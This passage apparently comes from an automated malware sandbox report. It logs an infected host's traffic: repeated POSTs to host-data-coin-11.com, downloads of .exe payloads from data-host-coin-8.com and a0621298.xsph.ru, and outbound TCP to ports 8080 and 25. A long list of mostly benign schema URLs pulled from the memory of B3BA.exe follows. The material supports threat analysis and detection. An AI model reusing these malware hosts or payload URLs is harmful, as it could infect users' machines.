                          Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://ivytp.com/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 214 | Host: host-data-coin-11.com
                          Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://rbokhamk.net/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 362 | Host: host-data-coin-11.com
                          Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://molmwvfdsj.org/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 275 | Host: host-data-coin-11.com
                          Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://uqmibnvyi.org/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 349 | Host: host-data-coin-11.com
                          Source: global traffic | HTTP traffic detected: GET /files/6961_1642089187_2359.exe HTTP/1.1 | Connection: Keep-Alive | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Host: data-host-coin-8.com
                          Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://cmmwfel.org/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 242 | Host: host-data-coin-11.com
                          Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://voeiplb.com/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 252 | Host: host-data-coin-11.com
                          Source: global traffic | HTTP traffic detected: GET /files/7729_1642101604_1835.exe HTTP/1.1 | Connection: Keep-Alive | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Host: data-host-coin-8.com
                          Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://xivyfkgciu.net/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 147 | Host: host-data-coin-11.com
                          Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://ydjicveig.com/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 327 | Host: host-data-coin-11.com
                          Source: global traffic | HTTP traffic detected: GET /45512.exe HTTP/1.1 | Connection: Keep-Alive | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Host: a0621298.xsph.ru
                          Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://mtcpl.com/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 213 | Host: host-data-coin-11.com
                          Source: global traffic | TCP traffic: 192.168.2.6:49788 -> 185.7.214.171:8080
                          Source: global traffic | TCP traffic: 192.168.2.6:49816 -> 104.47.54.36:25
                          Source: B3BA.exe, 0000002A.00000002.753014761.0000000003403000.00000004.00000001.sdmp, B3BA.exe, 0000002A.00000002.726282162.0000000003230000.00000004.00000001.sdmp, B3BA.exe, 0000002A.00000002.748298301.0000000003345000.00000004.00000001.sdmp, B3BA.exe, 0000002A.00000002.664507958.0000000002F34000.00000004.00000001.sdmp | String found in binary or memory: https://www.facebook.com/chat/video/videocalldownload.php
                          Source: B3BA.exe, 0000002A.00000002.753014761.0000000003403000.00000004.00000001.sdmp, B3BA.exe, 0000002A.00000002.726282162.0000000003230000.00000004.00000001.sdmp, B3BA.exe, 0000002A.00000002.664507958.0000000002F34000.00000004.00000001.sdmp | String found in binary or memory: http://appldnld.apple.com/QuickTime/041-3089.20111026.Sxpr4/QuickTimeInstaller.exe
                          Source: WerFault.exe, 00000012.00000002.519792531.0000000004AC0000.00000004.00000001.sdmp, svchost.exe, 0000001C.00000002.528163156.0000023922500000.00000004.00000001.sdmp, svchost.exe, 00000028.00000002.708255454.000001D6DA28A000.00000004.00000001.sdmp | String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
                          Source: svchost.exe, 0000001C.00000002.527807876.0000023921EED000.00000004.00000001.sdmp, svchost.exe, 00000028.00000002.689092568.000001D6DA212000.00000004.00000001.sdmp | String found in binary or memory: http://crl.ver)
                          Source: B3BA.exe, 0000002A.00000002.664507958.0000000002F34000.00000004.00000001.sdmp | String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#Base64Binary
                          Source: B3BA.exe, 0000002A.00000002.664507958.0000000002F34000.00000004.00000001.sdmp | String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#HexBinary
                          Source: B3BA.exe, 0000002A.00000002.664507958.0000000002F34000.00000004.00000001.sdmp | String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#Text
                          Source: B3BA.exe, 0000002A.00000002.664507958.0000000002F34000.00000004.00000001.sdmp | String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd
                          Source: B3BA.exe, 0000002A.00000002.664507958.0000000002F34000.00000004.00000001.sdmp | String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd
                          Source: B3BA.exe, 0000002A.00000002.664507958.0000000002F34000.00000004.00000001.sdmp | String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-x509-token-profile-1.0#X509SubjectKeyIdentif
                          Source: B3BA.exe, 0000002A.00000002.664507958.0000000002F34000.00000004.00000001.sdmp | String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-kerberos-token-profile-1.1#GSS_Kerberosv5_AP_REQ
                          Source: B3BA.exe, 0000002A.00000002.664507958.0000000002F34000.00000004.00000001.sdmp | String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-kerberos-token-profile-1.1#GSS_Kerberosv5_AP_REQ1510
                          Source: B3BA.exe, 0000002A.00000002.664507958.0000000002F34000.00000004.00000001.sdmp | String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-kerberos-token-profile-1.1#Kerberosv5APREQSHA1
                          Source: B3BA.exe, 0000002A.00000002.664507958.0000000002F34000.00000004.00000001.sdmp | String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-rel-token-profile-1.0.pdf#license
                          Source: B3BA.exe, 0000002A.00000002.664507958.0000000002F34000.00000004.00000001.sdmp | String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.0#SAMLAssertionID
                          Source: B3BA.exe, 0000002A.00000002.664507958.0000000002F34000.00000004.00000001.sdmp | String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLID
                          Source: B3BA.exe, 0000002A.00000002.664507958.0000000002F34000.00000004.00000001.sdmp | String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLV1.1
                          Source: B3BA.exe, 0000002A.00000002.664507958.0000000002F34000.00000004.00000001.sdmp | String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLV2.0
                          Source: B3BA.exe, 0000002A.00000002.664507958.0000000002F34000.00000004.00000001.sdmp | String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#EncryptedKey
                          Source: B3BA.exe, 0000002A.00000002.664507958.0000000002F34000.00000004.00000001.sdmp | String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#EncryptedKeySHA1
                          Source: B3BA.exe, 0000002A.00000002.664507958.0000000002F34000.00000004.00000001.sdmp | String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#ThumbprintSHA1
                          Source: B3BA.exe, 0000002A.00000002.664507958.0000000002F34000.00000004.00000001.sdmp | String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-wssecurity-secext-1.1.xsd
                          Source: B3BA.exe, 0000002A.00000002.753014761.0000000003403000.00000004.00000001.sdmp, B3BA.exe, 0000002A.00000002.726282162.0000000003230000.00000004.00000001.sdmp, B3BA.exe, 0000002A.00000002.748298301.0000000003345000.00000004.00000001.sdmp, B3BA.exe, 0000002A.00000002.664507958.0000000002F34000.00000004.00000001.sdmp | String found in binary or memory: http://download.divx.com/player/divxdotcom/DivXWebPlayerInstaller.exe
                          Source: B3BA.exe, 0000002A.00000002.753014761.0000000003403000.00000004.00000001.sdmp, B3BA.exe, 0000002A.00000002.726282162.0000000003230000.00000004.00000001.sdmp | String found in binary or memory: http://forms.rea
                          Source: B3BA.exe, 0000002A.00000002.753014761.0000000003403000.00000004.00000001.sdmp, B3BA.exe, 0000002A.00000002.726282162.0000000003230000.00000004.00000001.sdmp, B3BA.exe, 0000002A.00000002.664507958.0000000002F34000.00000004.00000001.sdmp | String found in binary or memory: http://forms.real.com/real/realone/download.html?type=rpsp_us
                          Source: B3BA.exe, 0000002A.00000002.753014761.0000000003403000.00000004.00000001.sdmp, B3BA.exe, 0000002A.00000002.726282162.0000000003230000.00000004.00000001.sdmp, B3BA.exe, 0000002A.00000002.748298301.0000000003345000.00000004.00000001.sdmp, B3BA.exe, 0000002A.00000002.664507958.0000000002F34000.00000004.00000001.sdmp | String found in binary or memory: http://fpdownload.macromedia.com/get/shockwave/default/english/win95nt/latest/Shockwave_Installer_Sl
                          Source: B3BA.exe, 0000002A.00000002.753014761.0000000003403000.00000004.00000001.sdmp, B3BA.exe, 0000002A.00000002.726282162.0000000003230000.00000004.00000001.sdmp | String found in binary or memory: http://go.micros
                          Source: svchost.exe, 0000001C.00000003.496464238.0000023922591000.00000004.00000001.sdmp | String found in binary or memory: http://help.disneyplus.com.
                          Source: B3BA.exe, 0000002A.00000002.664507958.0000000002F34000.00000004.00000001.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/2005/02/trust/spnego#GSS_Wrap
                          Source: B3BA.exe, 0000002A.00000002.664507958.0000000002F34000.00000004.00000001.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/2005/02/trust/tlsnego#TLS_Wrap
                          Source: B3BA.exe, 0000002A.00000002.648719178.0000000002EA1000.00000004.00000001.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/soap/actor/next
                          Source: B3BA.exe, 0000002A.00000002.648719178.0000000002EA1000.00000004.00000001.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
                          Source: B3BA.exe, 0000002A.00000002.664507958.0000000002F34000.00000004.00000001.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2002/12/policy
                          Source: B3BA.exe, 0000002A.00000002.664507958.0000000002F34000.00000004.00000001.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/sc
                          Source: B3BA.exe, 0000002A.00000002.664507958.0000000002F34000.00000004.00000001.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/sc/dk
                          Source: B3BA.exe, 0000002A.00000002.664507958.0000000002F34000.00000004.00000001.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/sc/sct
                          Source: B3BA.exe, 0000002A.00000002.664507958.0000000002F34000.00000004.00000001.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/CK/PSHA1
                          Source: B3BA.exe, 0000002A.00000002.664507958.0000000002F34000.00000004.00000001.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/Issue
                          Source: B3BA.exe, 0000002A.00000002.664507958.0000000002F34000.00000004.00000001.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/Nonce
                          Source: B3BA.exe, 0000002A.00000002.664507958.0000000002F34000.00000004.00000001.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/RST/Issue
                          Source: B3BA.exe, 0000002A.00000002.664507958.0000000002F34000.00000004.00000001.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/RST/SCT
                          Source: B3BA.exe, 0000002A.00000002.664507958.0000000002F34000.00000004.00000001.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/RSTR/Issue
                          Source: B3BA.exe, 0000002A.00000002.664507958.0000000002F34000.00000004.00000001.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/RSTR/SCT
                          Source: B3BA.exe, 0000002A.00000002.664507958.0000000002F34000.00000004.00000001.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/SymmetricKey
                          Source: B3BA.exe, 0000002A.00000002.664507958.0000000002F34000.00000004.00000001.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/trust
                          Source: B3BA.exe, 0000002A.00000002.664507958.0000000002F34000.00000004.00000001.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/trust/PublicKey
                          Source: B3BA.exe, 0000002A.00000002.664507958.0000000002F34000.00000004.00000001.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/trust/SymmetricKey
                          Source: B3BA.exe, 0000002A.00000002.664507958.0000000002F34000.00000004.00000001.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/06/addressingex
                          Source: B3BA.exe, 0000002A.00000002.648719178.0000000002EA1000.00000004.00000001.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing
                          Source: B3BA.exe, 0000002A.00000002.648719178.0000000002EA1000.00000004.00000001.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/faultD
                          Source: B3BA.exe, 0000002A.00000002.648719178.0000000002EA1000.00000004.00000001.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous
                          Source: B3BA.exe, 0000002A.00000002.664507958.0000000002F34000.00000004.00000001.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat
                          Source: B3BA.exe, 0000002A.00000002.664507958.0000000002F34000.00000004.00000001.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Aborted
                          Source: B3BA.exe, 0000002A.00000002.664507958.0000000002F34000.00000004.00000001.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Commit
                          Source: B3BA.exe, 0000002A.00000002.664507958.0000000002F34000.00000004.00000001.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Committed
                          Source: B3BA.exe, 0000002A.00000002.664507958.0000000002F34000.00000004.00000001.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Completion
                          Source: B3BA.exe, 0000002A.00000002.664507958.0000000002F34000.00000004.00000001.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Durable2PC
                          Source: B3BA.exe, 0000002A.00000002.664507958.0000000002F34000.00000004.00000001.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Prepare
                          Source: B3BA.exe, 0000002A.00000002.664507958.0000000002F34000.00000004.00000001.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Prepared
                          Source: B3BA.exe, 0000002A.00000002.664507958.0000000002F34000.00000004.00000001.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/ReadOnly
                          Source: B3BA.exe, 0000002A.00000002.664507958.0000000002F34000.00000004.00000001.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Replay
                          Source: B3BA.exe, 0000002A.00000002.664507958.0000000002F34000.00000004.00000001.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Rollback
                          Source: B3BA.exe, 0000002A.00000002.664507958.0000000002F34000.00000004.00000001.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Volatile2PC
                          Source: B3BA.exe, 0000002A.00000002.664507958.0000000002F34000.00000004.00000001.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/fault
                          Source: B3BA.exe, 0000002A.00000002.664507958.0000000002F34000.00000004.00000001.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor
                          Source: B3BA.exe, 0000002A.00000002.664507958.0000000002F34000.00000004.00000001.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/CreateCoordinationContext
                          Source: B3BA.exe, 0000002A.00000002.664507958.0000000002F34000.00000004.00000001.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/CreateCoordinationContextResponse
                          Source: B3BA.exe, 0000002A.00000002.664507958.0000000002F34000.00000004.00000001.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/Register
                          Source: B3BA.exe, 0000002A.00000002.664507958.0000000002F34000.00000004.00000001.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/RegisterResponse
                          Source: B3BA.exe, 0000002A.00000002.664507958.0000000002F34000.00000004.00000001.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/fault
                          Source: B3BA.exe, 0000002A.00000002.648719178.0000000002EA1000.00000004.00000001.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm
                          Source: B3BA.exe, 0000002A.00000002.648719178.0000000002EA1000.00000004.00000001.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/AckRequested
                          Source: B3BA.exe, 0000002A.00000002.648719178.0000000002EA1000.00000004.00000001.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/CreateSequence
                          Source: B3BA.exe, 0000002A.00000002.648719178.0000000002EA1000.00000004.00000001.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/CreateSequenceResponse
                          Source: B3BA.exe, 0000002A.00000002.648719178.0000000002EA1000.00000004.00000001.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/LastMessage
                          Source: B3BA.exe, 0000002A.00000002.648719178.0000000002EA1000.00000004.00000001.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/SequenceAcknowledgement
                          Source: B3BA.exe, 0000002A.00000002.648719178.0000000002EA1000.00000004.00000001.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/TerminateSequence
                          Source: B3BA.exe, 0000002A.00000002.664507958.0000000002F34000.00000004.00000001.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc
                          Source: B3BA.exe, 0000002A.00000002.664507958.0000000002F34000.00000004.00000001.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc/dk
                          Source: B3BA.exe, 0000002A.00000002.664507958.0000000002F34000.00000004.00000001.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc/dk/p_sha1
                          Source: B3BA.exe, 0000002A.00000002.664507958.0000000002F34000.00000004.00000001.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc/sct
                          Source: B3BA.exe, 0000002A.00000002.664507958.0000000002F34000.00000004.00000001.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust
                          Source: B3BA.exe, 0000002A.00000002.664507958.0000000002F34000.00000004.00000001.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust#BinarySecret
                          Source: B3BA.exe, 0000002A.00000002.664507958.0000000002F34000.00000004.00000001.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/CK/PSHA1
                          Source: B3BA.exe, 0000002A.00000002.664507958.0000000002F34000.00000004.00000001.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Cancel
                          Source: B3BA.exe, 0000002A.00000002.664507958.0000000002F34000.00000004.00000001.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Issue
                          Source: B3BA.exe, 0000002A.00000002.664507958.0000000002F34000.00000004.00000001.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Nonce
                          Source: B3BA.exe, 0000002A.00000002.664507958.0000000002F34000.00000004.00000001.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/PublicKey
                          Source: B3BA.exe, 0000002A.00000002.664507958.0000000002F34000.00000004.00000001.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/Issue
                          Source: B3BA.exe, 0000002A.00000002.664507958.0000000002F34000.00000004.00000001.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/SCT
                          Source: B3BA.exe, 0000002A.00000002.664507958.0000000002F34000.00000004.00000001.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/SCT/Cancel
                          Source: B3BA.exe, 0000002A.00000002.664507958.0000000002F34000.00000004.00000001.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/SCT/Renew
                          Source: B3BA.exe, 0000002A.00000002.664507958.0000000002F34000.00000004.00000001.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/Issue
                          Source: B3BA.exe, 0000002A.00000002.664507958.0000000002F34000.00000004.00000001.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT
                          Source: B3BA.exe, 0000002A.00000002.664507958.0000000002F34000.00000004.00000001.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT/Cancel
                          Source: B3BA.exe, 0000002A.00000002.664507958.0000000002F34000.00000004.00000001.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT/Renew
                          Source: B3BA.exe, 0000002A.00000002.664507958.0000000002F34000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Renew
                          Source: B3BA.exe, 0000002A.00000002.664507958.0000000002F34000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/SymmetricKey
                          Source: B3BA.exe, 0000002A.00000002.664507958.0000000002F34000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/spnego
                          Source: B3BA.exe, 0000002A.00000002.664507958.0000000002F34000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/tlsnego
                          Source: B3BA.exe, 0000002A.00000002.648719178.0000000002EA1000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/dns
                          Source: B3BA.exe, 0000002A.00000002.664507958.0000000002F34000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                          Source: B3BA.exe, 0000002A.00000002.648719178.0000000002EA1000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/right/possessproperty
                          Source: B3BA.exe, 0000002A.00000002.663930181.0000000002F30000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2006/02/addressingidentity
                          Source: B3BA.exe, 0000002A.00000002.753014761.0000000003403000.00000004.00000001.sdmp, B3BA.exe, 0000002A.00000002.726282162.0000000003230000.00000004.00000001.sdmpString found in binary or memory: http://service.r
                          Source: B3BA.exe, 0000002A.00000002.753014761.0000000003403000.00000004.00000001.sdmp, B3BA.exe, 0000002A.00000002.726282162.0000000003230000.00000004.00000001.sdmp, B3BA.exe, 0000002A.00000002.664507958.0000000002F34000.00000004.00000001.sdmpString found in binary or memory: http://service.real.com/realplayer/security/02062012_player/en/
                          Source: B3BA.exe, 0000002A.00000002.753014761.0000000003403000.00000004.00000001.sdmp, B3BA.exe, 0000002A.00000002.726282162.0000000003230000.00000004.00000001.sdmpString found in binary or memory: http://support.a
                          Source: B3BA.exe, 0000002A.00000002.753014761.0000000003403000.00000004.00000001.sdmp, B3BA.exe, 0000002A.00000002.726282162.0000000003230000.00000004.00000001.sdmp, B3BA.exe, 0000002A.00000002.664507958.0000000002F34000.00000004.00000001.sdmpString found in binary or memory: http://support.apple.com/kb/HT203092
                          Source: B3BA.exe, 0000002A.00000002.664507958.0000000002F34000.00000004.00000001.sdmp, B3BA.exe, 0000002A.00000002.648719178.0000000002EA1000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/
                          Source: B3BA.exe, 0000002A.00000002.648719178.0000000002EA1000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id1
                          Source: B3BA.exe, 0000002A.00000002.648719178.0000000002EA1000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id10
                          Source: B3BA.exe, 0000002A.00000002.648719178.0000000002EA1000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id10Response
                          Source: B3BA.exe, 0000002A.00000002.648719178.0000000002EA1000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id11
                          Source: B3BA.exe, 0000002A.00000002.648719178.0000000002EA1000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id11Response
                          Source: B3BA.exe, 0000002A.00000002.648719178.0000000002EA1000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id12
                          Source: B3BA.exe, 0000002A.00000002.648719178.0000000002EA1000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id12Response
                          Source: B3BA.exe, 0000002A.00000002.648719178.0000000002EA1000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id13
                          Source: B3BA.exe, 0000002A.00000002.648719178.0000000002EA1000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id13Response
                          Source: B3BA.exe, 0000002A.00000002.648719178.0000000002EA1000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id14
                          Source: B3BA.exe, 0000002A.00000002.648719178.0000000002EA1000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id14Response
                          Source: B3BA.exe, 0000002A.00000002.648719178.0000000002EA1000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id15
                          Source: B3BA.exe, 0000002A.00000002.648719178.0000000002EA1000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id15Response
                          Source: B3BA.exe, 0000002A.00000002.648719178.0000000002EA1000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id16
                          Source: B3BA.exe, 0000002A.00000002.648719178.0000000002EA1000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id16Response
                          Source: B3BA.exe, 0000002A.00000002.648719178.0000000002EA1000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id17
                          Source: B3BA.exe, 0000002A.00000002.648719178.0000000002EA1000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id17Response
                          Source: B3BA.exe, 0000002A.00000002.648719178.0000000002EA1000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id18
                          Source: B3BA.exe, 0000002A.00000002.648719178.0000000002EA1000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id18Response
                          Source: B3BA.exe, 0000002A.00000002.648719178.0000000002EA1000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id19
                          Source: B3BA.exe, 0000002A.00000002.648719178.0000000002EA1000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id19Response
                          Source: B3BA.exe, 0000002A.00000002.664507958.0000000002F34000.00000004.00000001.sdmp, B3BA.exe, 0000002A.00000002.648719178.0000000002EA1000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id1Response
                          Source: B3BA.exe, 0000002A.00000002.648719178.0000000002EA1000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id2
                          Source: B3BA.exe, 0000002A.00000002.648719178.0000000002EA1000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id20
                          Source: B3BA.exe, 0000002A.00000002.648719178.0000000002EA1000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id20Response
                          Source: B3BA.exe, 0000002A.00000002.648719178.0000000002EA1000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id21
                          Source: B3BA.exe, 0000002A.00000002.648719178.0000000002EA1000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id21Response
                          Source: B3BA.exe, 0000002A.00000002.648719178.0000000002EA1000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id22
